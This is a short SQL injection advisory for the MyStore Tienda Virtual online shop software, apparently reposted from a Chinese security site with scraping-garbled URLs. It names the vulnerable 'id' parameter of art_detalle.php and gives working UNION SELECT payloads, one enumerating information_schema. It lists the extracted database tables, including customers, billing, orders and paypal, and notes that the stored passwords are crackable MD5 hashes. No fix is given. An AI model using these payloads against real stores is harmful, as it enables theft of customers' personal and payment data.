标题: SQL Injection MyStore Tienda Virtual | 作者: Arturo Zamora Arturo_zamora_c@hotmail测试数据 | 开发者: MyStore Tienda Virtual http://HdhCmsTestmystore测试数据.mx/ | 测试方法 : ====================== http://HdhCmsTest2cto测试数据 /path/art_detalle.php?id={sqli} ====================== 示例 ====================== http://HdhCmsTest2cto测试数据 /path/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13-- http://HdhCmsTest2cto测试数据 /path/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables-- ====================== dbs: ====================== articulos articulos_nivel3 articulos_relaciona dos articulos_secciones atajada atajadausa ayuda ayudausa banners banners_conteo banners_lateral banners_lateralusa basket campania clientesclientes_envio clientes_facturacion colores comentario comisionistas comisionistas_hits comisionistas_modulos contacto descuentos descuentos_cruzados descuentos_temp especificacion home homeusa justin justinusa mensajeria mensajeriausa mixer newsletter newsletter_mensaje nivel1 nivel2 nivel3 parametros paypal pedidos pedidos_detalle pedidos_detalleusa pedidosusa remate remateusa secciones shopper sol_info talisman tallas ticker tickerusa visitas ====================== Information : ====================== password decrypt md5 ====================== I Love U Pumosita
查看更多关于MyStore Tienda Virtual SQL注射缺陷及修复 - 网站安全的详细内容...